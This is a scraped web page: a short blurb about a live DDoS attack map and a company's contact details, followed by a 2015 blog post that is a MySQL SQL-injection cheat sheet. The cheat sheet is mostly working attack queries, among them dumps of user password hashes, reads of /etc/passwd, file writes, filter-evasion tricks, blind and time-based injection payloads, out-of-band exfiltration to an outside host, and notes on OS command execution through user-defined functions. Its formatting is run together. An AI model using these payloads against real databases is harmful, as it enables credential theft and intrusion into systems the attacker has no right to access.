Live Ddos View

Live DDoS Attack Map | Apakau

Live DDoS Attack Map

This map is the fruit of collaboration between Google Ideas and Arbor Networks in an effort to raise awareness about distributed denial of service attacks in the world everyday.

Exploring the Data

The Digital Attack Map displays global DDoS activity on any given day. Attacks are displayed as dotted lines, scaled to size, and placed according to the source and destination countries of the attack traffic when known. Some features include:

Use the histogram at the bottom of the map to explore historical data.
Select a country to view DDoS activity to or from that country.
Use the color option to view attacks by class, duration, or source/destination port.
Use the news section to find online reports of attack activity from a specified time.
View the gallery to explore some examples of days with notable DDoS attacks.

About Us

Apakau, Inc. - based in Sunnyvale, CA - provides a service that helps enterprises around the globe achieve maximum performance and availability of their web and mobile applications. By ensuring ultra low latency of dynamic application data and APIs, Apakau eliminates delays that users - all over the world - experience on enterprise applications, on desktop as well as mobile devices.

Contact Us

info@apakau.com
+1 (415) 462-4934

415 Oakmead Pkwy
Sunnyvale, CA 94085

Follow Us

Copyright © 2014 Apakau, Inc. All rights reserved.

Saturday, May 30, 2015

Usefull Stuff For SQLI

*A handful of useful functions, syntaxes and queries for MySQL.Also knows as a MySQL Cheat Sheet.***Code: [Select] `Version:` `SELECT VERSION()` `SELECT @@version` `SELECT @@version_comment` `SELECT @@version_compile_machine` `SELECT @@version_compile_osDirectories:` `SELECT @@basedir` `SELECT @@tmpdir` `SELECT @@datadirUsers:` `SELECT USER()` `SELECT SYSTEM_USER()` `SELECT SESSION_USER()` `SELECT CURRENT_USER()Current Database:` `SELECT DATABASE()Concatenation:` `SELECT CONCAT('foo','.','bar'); #Returns: foo.bar` `SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Returns: Hello MySQL and hello world!Multi-Concat:#Stacks the row "foo" from the table "bar" together, using the separator "<br />".` `#Note: This operation can by default only grab 1024 bytes, and do not allow LIMIT.` `#The 1024 byte limit is stored in the @@group_concat_max_len variable.SELECT GROUP_CONCAT(foo SEPARATOR '<br />') FROM barBetter-Concat:#CONCAT() and CONCAT_WS() do not have the same restriction(s) as GROUP_CONCAT().` `#Which therefor allows you to concat strings together up to the @@max_allowed_packet size,` `#instead of @@group_concat_max_len. The default value for @@max_allowed_packet is currently set to` `#1048576 bytes, instead of @@group_concat_max_len's 1024.`SELECT (CONCAT_WS(0x3A,(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 0,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 1,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 2,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 3,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 4,1)))`Change Collation:SELECT CONVERT('test' USING latin1); #Converts "test" to latin1 from any other collation.` `SELECT CONVERT('rawr' USING utf8); #Converts "rawr" to utf8.Wildcards in SELECT(s):` `SELECT foo FROM bar WHERE id LIKE 'test%'; #Returns all COLUMN(s) starting with "test".` `SELECT foo FROM bar WHERE id LIKE '%test'; #Returns all COLUMN(s) ending with "test".Regular Expression in SELECT(s):#Returns all columns matching the regular expression.SELECT foo FROM bar WHERE id RLIKE '(moo|rawr).'SELECT Without Dublicates:SELECT DISTINCT foo FROM barCounting Columns:` `SELECT COUNT(foo) FROM bar; #Returns the amount of rows "foo" from the table "bar".Get Amount of MySQL Users:` `SELECT COUNT(user) FROM mysql.userGet MySQL Users:` `SELECT user FROM mysql.userGet MySQL User Privileges:` `SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privilegesGet MySQL User Privileges on Different Databases:` `SELECT grantee,table_schema,privilege_type FROM information_schema.schema_privileges` `Get MySQL User Privileges on Different Columns:` `SELECT table_schema,table_name,column_name,privilege_type FROM information_schema.column_privilegesGet MySQL User Credentials & Privileges:` `SELECT CONCAT_WS(0x2E,host,user,password,Select_priv,Insert_priv,Update_priv,Delete_priv,` `Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,` `File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,` `Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,` `Repl_client_priv) FROM mysql.userGet MySQL DBA Accounts:` `SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges WHERE privilege_type='SUPER'` `SELECT host,user FROM mysql.user WHERE Super_priv='Y'Get Databases:` `SELECT schema_name FROM information_schema.schemata` `SELECT DISTINCT db FROM mysql.db` `SELECT DISTINCT table_schema FROM information_schema.columns` `SELECT DISTINCT table_schema FROM information_schema.tablesGet Databases & Tables:` `SELECT table_schema,table_name FROM information_schema.tables` `SELECT DISTINCT table_schema,table_name FROM information_schema.columnsGet Databases, Tables & Columns:` `SELECT table_schema,table_name,column_name FROM information_schema.columnsSELECT A Certain Row:SELECT foo FROM bar LIMIT 0,1; #Returns row 0.` `SELECT foo FROM bar LIMIT 1,1; #Returns row 1.` `...` `SELECT foo FROM bar LIMIT N,1; #Returns row N.Benchmark (Heavy Query):#Performs an MD5 calculation of "1" for 10000 times.SELECT BENCHMARK(10000,MD5(1))Sleep:#Works only in MySQL 5 and above.` `#Sleeps for 5 seconds, returns 0 on success.SELECT SLEEP(5)Conversion (Casting):SELECT CAST('1' AS UNSIGNED INTEGER); #Returns: 1` `SELECT CAST('65' AS CHAR); #Returns: ASubstring:SELECT SUBSTR('foobar',1,3); #Returns: fooHexadecimal Evasion:SELECT 0x41424344; #Returns: ABCD` `SELECT 0x2E; #Returns: .` `SELECT 0x3A; #Returns: :ASCII to Number:SELECT ASCII('A'); #Returns: 65` `Number to ASCII:SELECT CHAR(65); #Returns: A` `SELECT CHAR(89); #Returns: Y` `SELECT CHAR(116,101,115,116); #Returns: testIf Statement:#Returns 1 if the database is running MySQL 5.SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0);#Returns 1 if the database is running MySQL 4.SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0);Case Statement:#Returns 1 if the database is running MySQL 5.SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=53) THEN 1 ELSE 0 END#Returns 1 if the database is running MySQL 4.SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=52) THEN 1 ELSE 0 ENDRead File(s):#Requires you to have the File_priv in mysql.user. On error this statement will return NULL.SELECT LOAD_FILE('/etc/passwd')Write File(s):#You must use quotes on the filename!SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt'` `SELECT IF((SELECT NULL INTO DUMPFILE '/tmp/test.txt')=NULL,NULL,'Hello World')Logical Operator(s):AND, &&; #The AND operator have && as an alternative syntax.OR, ||; #The OR operator have || as an alternative syntax.NOT, !; #The NOT operator have ! as an alternative syntax.XOR; #The XOR operator got no alternative syntax.Fuzzy Code Comment:#Code within /! are getting executed by MySQL. Additional /! can be used instead of space as evasion.` `SELECT/!CONCAT_WS(0x3A,user,host,password)/!FROM/!mysql.user/Comments:SELECT foo, bar FROM foo.bar-- Single line comment` `SELECT foo, bar FROM foo.bar/ Multi line comment */` `SELECT foo, bar FROM foo.bar# Single line comment` `SELECT foo, bar FROM foo.bar; Batched query with additional NULL-byte. It do not work together with PHP though.A few evasions/methods to use between your MySQL statements:CR (%0D); #Carrier Return.LF (%0A); #Line Feed.Tab (%09); #The Tab-key.Space (%20); #Most commonly used. You know what a space is.Multiline Comment (/**/); #Well, as the name says.` `Fuzzy Comment (/!); #Be sure to end your query with (/)Parenthesis, ( and ); #Can also be used as separators when used right.Parenthesis instead of space:#As said two lines above, the use of parenthesis can be used as a separator.SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2))Auto-Casting to Right Collation:SELECT UNHEX(HEX(USER())); #UNHEX() Converts the hexadecimal value(s) to the current collation.DNS Requests (OOB (Out-Of-Band)):#For more information check this.SELECT YourQuery INTO OUTFILE ‘\\\\www.your.host.com\\?file_to_save_as.txt’Command Execution:#If you're on a MySQL 4.X server, it's possible to execute OS commands as long as you're DBA.` `#It can be done if you're able to upload a shared object into /usr/lib.` `#The file extension is .so, and it must contain an "User Defined Function", UDF.` `#Get raptor_udf.c, it's the source-code for just that feature.` `#Remember to compile it for the right CPU Architecture.` `#The CPU architecture can be resolved by this query:SELECT @@version_machine;` `<blockquote>A couple of useful blind queries to fingerprint the database.All of these return either True or False, as in, you either get a result or you don't.</blockquote> Version:SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53; #MySQL 5` `SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52; #MySQL 4Running as root:SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=UNHEX(HEX(0x726F6F74)),1,0)=1Got File_priv:SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user WHERE` `(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR` `(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR` `(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37)))` `LIMIT 0,1)=CHAR(89),1,0)=1Got Super_priv (Are we DBA):SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql.user WHERE` `(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR` `(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR` `(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37)))` `LIMIT 0,1)=CHAR(89),1,0)=1Can MySQL Sleep:#This query will return True and should take above 1 second to execute. If it's a success.SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1Can MySQL Benchmark:SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1Are we on NIX:SELECT FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47Are we on Windows:SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=58,1,0)=1Do a certain column exist:SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE column_name LIKE 'your_column' LIMIT 0,1)>0` `Do a certain table exist:SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.columns WHERE table_name LIKE 'your_table' LIMIT 0,1)>0SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_name LIKE 'your_table' LIMIT 0,1)>0Do a certain database exist:SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.columns WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.tables WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information_schema.schemata WHERE schema_name LIKE 'your_database' LIMIT 0,1)>0SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db WHERE db LIKE 'your_database' LIMIT 0,1)>0#D@rkSec`

Subscribe to: Posts (Atom)